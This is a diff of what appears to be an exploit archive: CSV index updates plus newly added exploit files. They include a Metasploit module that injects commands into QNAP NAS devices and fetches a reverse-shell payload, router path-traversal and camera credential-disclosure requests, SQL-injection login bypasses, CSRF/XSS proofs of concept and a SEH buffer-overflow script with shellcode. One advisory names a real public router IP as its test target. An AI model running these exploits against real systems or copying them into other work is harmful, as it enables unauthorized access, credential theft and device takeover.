Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 -24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 +24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0 @@ -27847,7 +27849,7 @@ id,file,description,date,author,platform,type,port 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0 24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 -24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 +24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0 24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 @@ -32579,7 +32581,7 @@ id,file,description,date,author,platform,type,port 31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081 -31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80 +31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 31768,platforms/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 @@ -32977,7 +32979,7 @@ id,file,description,date,author,platform,type,port 32374,platforms/ios/webapps/32374.txt,"Wireless Drive 1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps,0 32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0 32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0 -32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0 +32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",php,webapps,0 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 @@ -38363,3 +38365,11 @@ id,file,description,date,author,platform,type,port 42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0 42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0 +42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0 +42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0 +42581,platforms/hardware/webapps/42581.txt,"D-Link DIR-600 - Authentication Bypass",2017-08-29,"Jithin D Kurup",hardware,webapps,0 +42582,platforms/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0 +42583,platforms/php/webapps/42583.txt,"PHP Appointment Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0 +42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0 +42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 +42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0 diff --git a/platforms/hardware/remote/42587.rb b/platforms/hardware/remote/42587.rb new file mode 100755 index 000000000..38384e993 --- /dev/null +++ b/platforms/hardware/remote/42587.rb @@ -0,0 +1,117 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'QNAP Transcode Server Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated remote command injection + vulnerability in QNAP NAS devices. The transcoding server listens + on port 9251 by default and is vulnerable to command injection + using the 'rmfile' command. + + This module was tested successfully on a QNAP TS-431 with + firmware version 4.3.3.0262 (20170727). + }, + 'Author' => + [ + 'Zenofex', # Initial vulnerability discovery and PoC + '0x00string', # Initial vulnerability discovery and PoC + 'Brendan Coles ' # Metasploit + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'References' => + [ + [ 'URL', 'https://www.exploitee.rs/index.php/QNAP_TS-131' ], + [ 'URL', 'http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm' ] + ], + 'DisclosureDate' => 'Aug 6 2017', + 'Privileged' => true, + 'Arch' => ARCH_ARMLE, + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' + }, + 'Targets' => [['Automatic', {}]], + 'CmdStagerFlavor' => %w{wget curl}, + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9251), + OptInt.new('DELAY', [true, 'How long to wait for the device to download the payload', 30]) + ]) + deregister_options 'cmdstager::decoder' + end + + def check + vprint_status 'Connecting to transcode server...' + + connect + sock.put "\x01\x00\x00\x00" + res = sock.get_once + + if res.blank? + vprint_status 'No reply from server' + return CheckCode::Safe + end + + vprint_status "Received response: #{res}" + + return CheckCode::Detected if res.to_s =~ /client's request is accepted/ + + CheckCode::Safe + rescue ::Rex::ConnectionError + vprint_error 'Connection failed' + return CheckCode::Unknown + ensure + disconnect + end + + def execute_command(cmd, opts) + # Filtered characters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } % + # Execute each command seperately + cmd.split(';').each do |c| + connect + vprint_status "Executing command: #{c}" + + # Replace spaces with tabs + c.tr! ' ', "\t" + + sock.put "\x01\x00\x00\x00/|#{c}|\x00" + res = sock.get_once + + unless res.to_s =~ /client's request is accepted/ + print_status 'Unexpected reply' + break + end + + print_status "Sent command successfully (#{c.length} bytes)" + + disconnect + + if c =~ /^(curl|wget)/ + print_status "Waiting for the device to download the payload (#{datastore['DELAY']} seconds)..." + Rex.sleep datastore['DELAY'] + end + end + rescue ::Rex::ConnectionError + fail_with Failure::Unreachable, 'Failed to connect to the transcode server' + ensure + disconnect + end + + def exploit + vprint_status 'Connecting to transcode server...' + execute_cmdstager linemax: 400 + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/42581.txt b/platforms/hardware/webapps/42581.txt new file mode 100755 index 000000000..b2c449f1b --- /dev/null +++ b/platforms/hardware/webapps/42581.txt @@ -0,0 +1,53 @@ +# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack) +# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 +# Date: 29-08-2017 +# Exploit Author: Jithin D Kurup +# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 +# Vendor : www.dlink.com +# Version: Hardware version: B1 +Firmware version: 2.01 +# Tested on:All Platforms + + +1) Description + +After Successfully Connected to D-Link DIR-600 +Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's +Admin Panel Just by adding a simple payload into URL. + +D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to +read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, +as demonstrated by discovering the admin password. + +Its More Dangerous when your Router has a public IP with remote login +enabled. + + +IN MY CASE, +Tested Router IP : http://190.164.170.249 + + + +Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ + +2) Proof of Concept + +Step 1: Go to +Router Login Page : http://190.164.170.249:8080 + +Step 2: +Add the payload to URL. + +Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd + + + +Bingooo You got admin Access on router. +Now you can download/upload settiing, Change setting etc. + + + + +---------------Greetz---------------- ++++++++++++ www.0seccon.com ++++++++++++ +Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith \ No newline at end of file diff --git a/platforms/hardware/webapps/42588.txt b/platforms/hardware/webapps/42588.txt new file mode 100755 index 000000000..512c2f5be --- /dev/null +++ b/platforms/hardware/webapps/42588.txt @@ -0,0 +1,117 @@ +1. Advisory Information +======================================== +Title: + +Brickcom IP-Camera Remote Credentials and Settings Disclosure + + +Vendor Homepage: + +http://www.brickcom.com + +Tested on Camera types: + +WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af + + +Remotely Exploitable: + +Yes + +Vulnerability: + +Username / Password / Settings Disclosure (Critical) + +Shodan Dork: + +title:"Brickcom" + + +Date: + +14/12/2016 + +Authors: + +Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar) + +Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio- +lizaso-9ab73359) +Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston- +emanuel-rivadero-858b9ba) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test and Research by +Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero. + + +3. Description +======================================== +Brickom Cameras allow a low-privilege user to disclose every configuration +in the NVRAM, including credentials in clear text, remotely by making a +simple requests. This vulnerability, coupled with the fact that there are +two default users with known passwords which are rarely modified, allows an +attacker to disclose the admin password and latter every config. + +The most Critical API call is users.cgi?action=getUsers, which provides +every user credential. Many other API calls to get information for the WIFI +password or FTP credentials, even the whole configuration, are affected +depending on the camera model. + +On the hardware side, the UART console of some models (example: WCB-040Af, +with baudrate 38400) is exposed in the PCB and after soldering the +corresponding pins and connecting, the resulting shell has root access. A +simple NVSHOW command will list every config available in clear text, +including credentials. + + +4. Proof-of-Concept: +======================================== +Using the following GET request: + +curl http://:/cgi-bin/users.cgi?action=getUsers -u user:pass -v + +Request: +---------- +> GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1 +> Authorization: Basic +> User-Agent: curl/7.35.0 +> Host: : +> Accept: */* +> + + +Response: +---------- +< HTTP/1.1 200 Ok +< Server: mini_httpd +< Cache-Control: no-cache +< Pragma: no-cache +< Expires: 0 +< Content-Type: text/html +< Connection: close +< +size=3 +User1.index=0 +User1.username=admin +User1.password=admin +User1.privilege=1 + +User2.index=1 +User2.username=viewer +User2.password=viewer +User2.privilege=0 + +User3.index=3 +User3.username=rviewer +User3.password=rviewer +User3.privilege=2 + +5. SOLUTION +======================================== +The vendor has been contacted and the firmware was updated. See disclosure +in: + +https://www.brickcom.com/news/productCERT_security_advisorie.php diff --git a/platforms/json/webapps/42579.txt b/platforms/json/webapps/42579.txt new file mode 100755 index 000000000..467950c09 --- /dev/null +++ b/platforms/json/webapps/42579.txt @@ -0,0 +1,60 @@ +NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability + + +Vendor: NethServer.org +Product web page: https://www.nethserver.org +Affected version: 7.3.1611-u1-x86_64 + +Summary: NethServer is an operating system for the Linux enthusiast, +designed for small offices and medium enterprises. It's simple, secure +and flexible. + +Desc: NethServer suffers from an authenticated stored XSS vulnerability. +Input passed to the 'BackupConfig[Upload][Description]' POST parameter is +not properly sanitised before being returned to the user. This can be exploited +to execute arbitrary HTML and script code in a user's browser session in +context of an affected site. + +Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64 + CentOS Linux 7.3.1611 (Core) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5432 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5432.php + + +16.08.2017 + +-- + + +PoC request: + +POST /en-US/BackupConfig/Upload.json HTTP/1.1 +Host: 172.19.0.195:980 +Connection: close +Content-Length: 15762 +Accept: */* +Origin: https://172.19.0.195:980 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80 +Referer: https://172.19.0.195:980/en-US/BackupConfig +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2 + +------WebKitFormBoundary8FfEu2Tn6fUOnT80 +Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz" +Content-Type: application/x-xz + +[xz content omitted] +------WebKitFormBoundary8FfEu2Tn6fUOnT80 +Content-Disposition: form-data; name="BackupConfig[Upload][Description]" + + +------WebKitFormBoundary8FfEu2Tn6fUOnT80-- + diff --git a/platforms/json/webapps/42580.html b/platforms/json/webapps/42580.html new file mode 100755 index 000000000..1288eb621 --- /dev/null +++ b/platforms/json/webapps/42580.html @@ -0,0 +1,58 @@ + + + +HTML Decoded PoC: + + + + +
+ + + + + + + + + + + + + +
+ + diff --git a/platforms/linux/local/394.c b/platforms/linux/local/394.c index f784d6a34..b98902bef 100755 --- a/platforms/linux/local/394.c +++ b/platforms/linux/local/394.c @@ -1,7 +1,8 @@ /* * This is simple local exploit (Proof of Concept?) for local bug in ProFTPd * not in default options (must be configured with option --enable-ctrls). - * Bug exist in function pr_ctrls_connect() in file "src/ctrls.c", look: + * Bug exist in func +tion pr_ctrls_connect() in file "src/ctrls.c", look: * * "src/ctrls.c" * int pr_ctrls_connect(const char *socket_file) { diff --git a/platforms/php/webapps/42582.txt b/platforms/php/webapps/42582.txt new file mode 100755 index 000000000..bd91e1808 --- /dev/null +++ b/platforms/php/webapps/42582.txt @@ -0,0 +1,46 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + +# ======================================================== +# +# +# Car or Cab Booking Script - SQL injection login bypass +# +# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school +# +# Proof of Concept : - +# +# http://localhost/taxibooking/login.php [ set username and password ] to >> admin' or 1=1 -- - +# you must choose the check box as current and existing user +# +# +# +# +# +# +# +# ======================================================== +# [+] Disclaimer +# +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and that due +# credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit is given to +# the author. The author is not responsible for any misuse of the information contained +# herein and prohibits any malicious use of all security related information +# or exploits by the author or elsewhere. +# +# +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42583.txt b/platforms/php/webapps/42583.txt new file mode 100755 index 000000000..87e6ce0d7 --- /dev/null +++ b/platforms/php/webapps/42583.txt @@ -0,0 +1,42 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + +# ======================================================== +# +# +# +# +# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin +# +# Proof of Concept : - +# +# http://localhost/appointment/admin_login.php [ set username and password ] to >> admin' or 1=1 -- - +# +# +# +# +# ======================================================== +# [+] Disclaimer +# +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and that due +# credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit is given to +# the author. The author is not responsible for any misuse of the information contained +# herein and prohibits any malicious use of all security related information +# or exploits by the author or elsewhere. +# +# +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42584.txt b/platforms/php/webapps/42584.txt new file mode 100755 index 000000000..e2d6e74af --- /dev/null +++ b/platforms/php/webapps/42584.txt @@ -0,0 +1,53 @@ +----------------------------------------------------------------------------------- +| + +|---------------------------------------------------------------------------------- + +1) admin dashboard authentication bypass + +Description : An Attackers are able to completely compromise the web application built upon +the user login and management php script as they can gain access to the admin panel and +manage other users as an admin without authentication! + + +Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php +Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php + + +Risk : Unauthenticated attackers are able to gain full access to the administrator panel +and thus have total control over the application and users , including add admin user .. etc + + +|---------------------------------------------------------------------------------- + + +2) account takeover - cross side request forgery + + +Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password + +> exploitation < + + + + +
+ + + + + + +|-----------------------------------------EOF----------------------------------------- diff --git a/platforms/php/webapps/42585.txt b/platforms/php/webapps/42585.txt new file mode 100755 index 000000000..1e4dea35b --- /dev/null +++ b/platforms/php/webapps/42585.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: PHP Video Battle Script 1.0 - SQL Injection +# Dork: N/A +# Date: 28.08.2017 +# Vendor Homepage: http://www.rocky.nu/ +# Software Link: http://www.rocky.nu/product/php-video-battle/ +# Demo: http://videobattle.rocky.nu/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/[SQL].html +# +# -1'+uNiOn+SeleCt++0x31,0x32,0x33,0x34,0x35,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x37+--+--+-.html +# +# http://localhost/[PATH]/videobattle.html?vote=[SQL] +# http://localhost/[PATH]/videobattle.html?draw=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/windows/local/42586.py b/platforms/windows/local/42586.py new file mode 100755 index 000000000..91aceb7f7 --- /dev/null +++ b/platforms/windows/local/42586.py @@ -0,0 +1,59 @@ + +#!/usr/bin/python + +############################################################################### +# Exploit Title: Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH) +# Date: 28-08-2017 +# Exploit Author: Kishan Sharma +# Email : thekishansharma@gmail.com +# Vulnerable Software: Easy Vedio to PSP Converter +# Vendor Homepage: http://www.divxtodvd.net/ +# Version: 1.6.20 +# Software Link: http://www.divxtodvd.net/easy_video_to_psp.exe +# Tested On: Windows 7 x64 +# To reproduce the exploit: +# 1. Click Register +# 2. In the "Enter User Name" field, paste the content of test.txt +# +############################################################################## + + +buffer = "\x41" * 1008 #Junk + +nSEH = "\xeb\x10\x90\x90" #Short Jump + +# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False +SEH = "\x59\x78\x03\x10" + +badchars = "\x00\x0a\x0d" # and 0x80 to 0xff + +# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python +buf = "" +buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b" +buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a" +buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d" +buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9" +buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4" +buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe" +buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c" +buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7" +buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3" +buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05" +buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae" +buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29" +buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c" +buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e" +buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44" +buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b" +buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae" + +nops = "\x90" * 16 #Nops + +badchars = "\x0a\x0d" + +data = buffer + nSEH + SEH + nops + buf + +f = open ("test.txt", "w") +f.write(data) +f.close() +